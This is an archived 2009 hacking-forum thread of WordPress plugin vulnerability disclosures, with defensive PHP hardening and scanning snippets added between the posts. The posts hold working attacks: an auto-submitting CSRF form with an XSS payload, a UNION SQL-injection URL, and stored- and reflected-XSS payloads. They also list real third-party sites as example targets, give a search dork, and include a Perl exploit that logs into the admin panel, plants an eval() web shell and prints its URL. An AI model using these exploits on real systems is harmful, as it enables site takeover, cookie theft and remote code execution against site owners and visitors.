
16.06.2009, 13:12
Mood Personalizer
Version: 1.1
Last Updated: 2009-6-11
Downloads: 453
XSS/XSRF
Code:
<form action='http://wordpress/wp-admin/options-general.php?page=mood-personalizer/mood-personalizer.php' method='post' name="xfrm">
<input name="xMPPic" type="text" value='"><script>alert(document.cookie)</script>' />
<input name="xMPHidd" type="text" value='xMPHidd' />
<input type='submit'>
</form>
<script>document.xfrm.submit();</script>
PHP code:
if($_POST['xMPHidd']=="xMPHidd"){
$xMPPicture = $_POST['xMPPic'];
$xMPPictureSize = $_POST['xMPPictureSize'];
$xMPPicture = str_replace(".2",".".$xMPPictureSize,$xMPPicture);
update_option('xMPPic', $xMPPicture);
}
PHP code:
<img src="<?php bloginfo('url'); ?>/wp-content/plugins/mood-personalizer/images/<?php echo get_option('xMPPic');?>" alt="Mood Personalizer mood image"/>
If the widget is placed in the sidebar, this becomes an active XSS on the front page.
__________________
use your head
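Added example, not part of the original post or the plugin's code: one way the settings handler and the image output quoted above could be hardened against both the forged cross-site POST and the stored markup. It runs inside WordPress; the nonce action name and the allow-listed image names are assumptions.

```php
<?php
/* Added example, not the plugin's code. The nonce action name and the
   allow-listed image names below are hypothetical. */
const MP_NONCE_ACTION = 'mood_personalizer_save';

/* Call inside the settings <form> so every legitimate POST carries a nonce. */
function mp_render_nonce_field() {
    wp_nonce_field(MP_NONCE_ACTION);
}

function mp_save_settings() {
    if (!isset($_POST['xMPHidd']) || $_POST['xMPHidd'] !== 'xMPHidd') {
        return;
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }
    /* Dies unless the request carries the nonce issued above, which a
       cross-site auto-submitting form cannot know. */
    check_admin_referer(MP_NONCE_ACTION);

    $picture = isset($_POST['xMPPic']) ? sanitize_file_name(wp_unslash($_POST['xMPPic'])) : '';
    $size    = isset($_POST['xMPPictureSize']) ? absint($_POST['xMPPictureSize']) : 0;
    /* Same size substitution as the original handler. */
    $picture = str_replace('.2', '.' . $size, $picture);

    $allowed = array('happy.1.png', 'happy.2.png', 'sad.1.png', 'sad.2.png'); // hypothetical
    if (!in_array($picture, $allowed, true)) {
        wp_die('Unknown mood image.');
    }
    update_option('xMPPic', $picture);
}

/* Output side: escape for the URL/attribute context even though the input was
   validated. Assumes this code lives in the plugin's main file (__FILE__). */
function mp_image_tag() {
    $src = plugins_url('images/' . get_option('xMPPic'), __FILE__);
    return '<img src="' . esc_url($src) . '" alt="Mood Personalizer mood image"/>';
}
```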

16.06.2009, 17:47
WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/
Author: Kacper
Website: http://devilteam.pl/
Greetings to everyone from the dc++ hub, and to everyone from the forum,
Greets: Ratman, Kopaczka, FDJ
Shout-out: to GLOBUS for help with cracking passwords.
Vuln:
Code:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
big thanks str0ke for you!
be safe all
# milw0rm.com [2009-06-15]
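Added example, not the plugin's code (the post does not show `viewimg.php`): how a numeric `id` parameter can be validated and bound so that a `union select` string never reaches the query. The SQLite table and column names are hypothetical; inside WordPress the same binding is done with `$wpdb->prepare()` and a `%d` placeholder.

```php
<?php
/* Added example: constructed in-memory schema; table and column names are hypothetical. */
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE images (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO images (id, title) VALUES (1, 'sunset'), (2, 'harbour')");

function fetch_image(PDO $db, $rawId): ?array
{
    /* Accept only a plain positive decimal integer; anything else is
       rejected before any SQL is built. */
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    /* The value travels as a bound integer parameter, never as query text. */
    $stmt = $db->prepare('SELECT id, title FROM images WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/* A legitimate id returns its row. */
var_dump(fetch_image($db, '2'));
/* The parameter value from the post fails validation and returns NULL. */
var_dump(fetch_image($db, '-1 union select 0,1,2,3,4,user(),6,7,8--'));
```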

30.06.2009, 19:08
WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP code:
89: if($_POST['advanced_twitter_widget_value']!=""){
90: $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
91: $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
92: $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
93: $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
94: update_option('advanced_twitter_widget_options', serialize($xArrOptions));
95: }
97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
101: $xTitle = $xArrOptions[0];
102: $xValue = $xArrOptions[1];
103: $xType = $xArrOptions[2];
104: $xCount = $xArrOptions[3];
111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
exploit:
Code:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.

30.06.2009, 19:09
WordPress Plugin ImHuman 0.0.9 XSS Vuln
http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
\imhuman.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP code:
151: if(isset( $_POST['do'] )) {
152: if ( function_exists('current_user_can') && !current_user_can('manage_options') )
153: die(__('Cheatin’ uh?'));
154: check_admin_referer($plugin_page);
155:
156: $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
157: $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
158: $t['imhuman_row'] = $_POST['imhuman_row'];
159: $t['imhuman_col'] = $_POST['imhuman_col'];
160: $t['imhuman_sel'] = $_POST['imhuman_sel'];
161: $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
162: $t['imhuman_word'] = $_POST['imhuman_word'];
163: $t['imhuman_lang'] = $_POST['imhuman_lang'];
164: update_option( 'imhuman_options', $t );
165: $m = '<p>Settings Saved!</p>';
166: }
167: $options = get_option( 'imhuman_options' );
....
194: <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
195: </tr>
196: <tr>
197: <th><?php _e('ImHuman Ap? Key'); ?></th>
198: <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>
exploit:
Code:
POST: do=.
POST: imhuman_api_user=">{XSS1}<a "
POST: imhuman_api_key=">{XSS1}<a "
POST: imhuman_row=.
POST: imhuman_col=.
POST: imhuman_sel=.
POST: imhuman_word=.
POST: imhuman_lang=.

30.06.2009, 22:48
WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
http://www.appchain.com/2009/06/live-countdown-timer-1-1/
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
\live-countdown-timer\live-countdown-timer.php
-----------------------------------------------------------------------------
142: $xPostArr[0] = $_POST['live_countdown_timer_Title'];
147: update_option('live_countdown_timer_Values', serialize($xPostArr));
....
149: $xDBArr = unserialize(get_option('live_countdown_timer_Values'));
150: $live_countdown_timer_Title = $xDBArr[0];
169: <input type="tex...le" value="<?php echo $live_countdown_timer_Title;?>" />
-----------------------------------------------------------------------------
exploit:
POST: live_countdown_timer_days = .
POST: live_countdown_timer_Title = ">{aXSS}<div id="
POST: live_countdown_timer_seconds = 12
POST: live_countdown_timer_hours = 11
POST: live_countdown_timer_days = 10

30.06.2009, 22:50
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
/simple-sidebar-navigation/settings/settings.php
-----------------------------------------------------------------------------
10: if (isset($_POST['ssn_submit'])):
11: update_option('dropdown_css', $_POST['dropdown_css']);
12: update_option('custom_css', $_POST['custom_css']);
13: update_option('blog_post_links', $_POST['blog_post_links']);
14: update_option('target_attr', $_POST['target_attr']);
...
57: <td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
-----------------------------------------------------------------------------
exploit:
POST: ssn_submit = .
POST: dropdown_css = .
POST: custom_css = ">{XSS}<div id="
POST: blog_post_links = .
POST: target_attr = .
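Added example, not from the posts above: the Advanced Twitter Widget, ImHuman, Live Countdown Timer and simple-sidebar-navigation reports all come down to a stored option echoed raw into a `value="..."` attribute, so a reviewer can search plugin source for that shape. The function name is hypothetical and the sample lines are constructed, modelled on the excerpts quoted in those posts plus one escaped line for contrast.

```php
<?php
/* Added example: flag a raw "echo $var" placed directly inside an HTML
   attribute value. Function name is hypothetical. */
function find_unescaped_attr_echo(string $source): array
{
    /* attribute name, opening quote, PHP open tag, echo of a bare variable
       (optionally with array indexes), PHP close tag. An echo wrapped in
       esc_attr() or htmlspecialchars() does not match. */
    $pattern = '/([\w-]+)\s*=\s*(["\'])<\?php\s+echo\s+'
             . '(\$[A-Za-z_]\w*(?:\[[^\]]*\])*)\s*;?\s*\?>/';
    $findings = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        if (preg_match_all($pattern, $line, $matches, PREG_SET_ORDER)) {
            foreach ($matches as $hit) {
                $findings[] = ['line' => $i + 1, 'attr' => $hit[1], 'expr' => $hit[3]];
            }
        }
    }
    return $findings;
}

/* Constructed sample: three lines modelled on the quoted excerpts, one safe line. */
$sample = <<<'SRC'
Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
<td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
<td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
<td><input type="text" name="escaped" value="<?php echo esc_attr($escaped); ?>" /></td>
SRC;

foreach (find_unescaped_attr_echo($sample) as $f) {
    printf(
        "line %d: attribute %s echoes %s raw; wrap it in esc_attr()\n",
        $f['line'],
        $f['attr'],
        $f['expr']
    );
}
```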

02.07.2009, 21:36
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
Code:
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
http://wordpress.org/extend/plugins/wordpress-toolbar/
http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
Dork: "inurl:wp-toolbar.php"
## ## ## ##
eLwaux(c)2009 UASC.org.ua
## ## ## ##
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
## ## ## ##
XSS
/wp-content/plugins/wordpress-toolbar/toolbar.php
-----------------------------------------------------------------
30: $tourl = $_GET['wp-toolbar-tourl'];
42: $blogtitle = $_GET['wp-toolbar-blogtitle'];
52: <title><?php echo $blogtitle; ?> - Toolbar</title>
56: <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
-----------------------------------------------------------------
PoC:
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
example:
http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
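Added example, not the plugin's code: context-appropriate output handling for the two `toolbar.php` sinks quoted above, the `<title>` text and the iframe `src`. Function names are hypothetical and the inputs are constructed from the parameter values shown in the post.

```php
<?php
/* Added example, not the plugin's code; function names are hypothetical. */

/* HTML-text context: the value lands between <title> and </title>. */
function toolbar_title(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/* URL-in-attribute context: accept only absolute http(s) URLs, then
   attribute-escape the result. Returns null when the value is rejected. */
function toolbar_iframe_src(string $raw): ?string
{
    $url = filter_var(trim($raw), FILTER_VALIDATE_URL);
    if ($url === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null; /* rejects javascript:, data: and similar schemes */
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/* Constructed inputs modelled on the parameter values quoted in the post. */
$title = toolbar_title('</title><script>alert(/xss/);</script>');
$bad   = toolbar_iframe_src('"><script>alert(/xss2/);</script><div id="');
$good  = toolbar_iframe_src('http://example.com/post?a=1&b=2');

/* The title is rendered as inert text, the malformed URL is dropped,
   and the valid URL has its ampersand encoded for the attribute. */
echo "<title>{$title} - Toolbar</title>\n";
echo $bad === null ? "iframe src rejected\n" : "<iframe src=\"{$bad}\"></iframe>\n";
echo "<iframe src=\"{$good}\"></iframe>\n";
```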

02.07.2009, 21:56
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin') ;
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
This kind of thing isn't worth publishing, since it's in practically every WordPress plugin and include file ;D

15.07.2009, 19:54
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
requires the admin login:password
Code:
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
------------
http://wordpress.org/extend/plugins/add-uroksu-catalog/
Add UROK.su Catalog
Version: 1.03
------------
\wp-content\plugins\add-uroksu-catalog\urok.su.class.php
----------------------------------------------------------------------
|56| if (isset($_POST['UPDATE'])) {
|57| $MyUROKsu_user=$_REQUEST['login'];
|58| $file_name=$file_name=dirname(__FILE__).'/login.txt';
|59| $w=fopen($file_name,'w');
|60| fwrite($w,$MyUROKsu_user);
|61| fclose($w);
|62| print($this->update_catalog($MyUROKsu_user));
|63| echo '</p>';
|64| }
----------------------------------------------------------------------
Steps to code execution:
1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
POST: UPDATE=.& login=<?php=@eval($_GET['c']);?>
(your code will be saved to file:
/wp-content/plugins/add-uroksu-catalog/login.txt)
2) include this file & code execute:
/wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');
perl exploit:
----------------------------------------------------------------------
PHP code:
#! /usr/bin/perl -w
use LWP::UserAgent;
use warnings;
print "\n WP ] add-uroksu-catalog < 1.03 [ exploit\n";
print " eLwaux(c)uasc 2009\n\n";
if (!$ARGV[2]) {
print " usage:\n".
" expl.pl http://site.com/wp/index.php adminLogin adminPass\n".
exit(0);
}
my $mHost = $ARGV[0];
my $mAdmL = $ARGV[1];
my $mAdmP = $ARGV[2];
#$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
#$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//);
my $UA = LWP::UserAgent->new;
$UA->timeout(20);
$UA->default_header('Referer' => $mHost.'wp-login.php');
$UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;');
# login to WP
my $page = $UA->post($mHost.'wp-login.php',
{
log => $mAdmL,
pwd => $mAdmP,
# rememberme => 'forever',
submit => 'Войти',
redirect_to => $mHost.'wp-admin/',
testcookie => 1
}
)->as_string;
my $cookie = '';
my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
foreach my $SC (@SetCookie) {
$cookie .= $SC.';';
}
if (length($cookie)<100) {
print ' - bad login:password!';
exit(0);
}
print ' - good login:password!'."\n";
$UA->default_header('Cookie' => $cookie);
print ' .. sending exploit..'."\n";
# send EXPLOIT
$page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php',
{
login => '<?php @eval($_GET[\'c\']);?>',
UPDATE => 1
}
)->as_string;
print ' + exploit send!'."\n";
# try execute simple code
$page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
print ' + result of test1: '.$1."\n";
print ' + result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
} else {
print ' - perhaps code is not injected!'."\n";
}
print ' ! FINISH!'."\n\n";
print ' !! your shell:'."\n";
print ' '.$mHost."\n".
' '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";
exit(0);
Code:
----------------------------------------------------------------------
simple result on localhost:
----------------------------------------------------------------------
> expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"
WP ] add-uroksu-catalog < 1.03 [ exploit
eLwaux(c)uasc 2009
- good login:password!
.. sending exploit..
+ exploit send!
+ result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
+ result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
! FINISH!
!! your shell:
http://localhost/cms/wordpress/
wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
----------------------------------------------------------------------
Last edited by eLWAux; 15.07.2009 at 21:38.
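Added example, not part of the original post: a defender-side check for the artifact this report describes, PHP code sitting in a data file such as `login.txt` under the plugins directory. The function name, the extension list and the temporary demo tree are constructed assumptions.

```php
<?php
/* Added example: report data files (by extension) that contain a PHP open
   tag. Function name and extension list are hypothetical. */
function find_php_in_data_files(string $root, array $dataExt = ['txt', 'log', 'dat', 'csv']): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        if (!in_array(strtolower($file->getExtension()), $dataExt, true)) {
            continue;
        }
        /* Read only the first 64 KiB; a settings file is expected to be tiny. */
        $head = file_get_contents($file->getPathname(), false, null, 0, 65536);
        if ($head !== false && preg_match('/<\?(php|=)/i', $head)) {
            $hits[] = $file->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

/* Constructed demo tree under the system temp directory. */
$root = sys_get_temp_dir() . '/plugin-scan-' . bin2hex(random_bytes(4));
mkdir("$root/add-uroksu-catalog", 0700, true);
file_put_contents("$root/add-uroksu-catalog/login.txt", "<?php /* constructed marker */ ?>");
file_put_contents("$root/add-uroksu-catalog/readme.txt", "plain text");

/* Only login.txt is reported. */
print_r(find_php_in_data_files($root));
```

On a real site, point `$root` at `wp-content/plugins` and treat any hit as a reason to inspect the file and the web server logs for requests that load it.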

22.07.2009, 16:28
XSS [All versions]
An XSS was published today; it works up to and including the current version.
Code:
http://www.site.com’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
To fix it, change line ~40 in wp-comments-post.php:
Code:
$comment_author_url = str_replace(chr(39),'',$comment_author_url);
$comment_author_url = str_replace(chr(59),'',$comment_author_url);
$comment_author_url = str_replace(chr(44),'',$comment_author_url);
Last edited by [underwater]; 22.07.2009 at 16:36.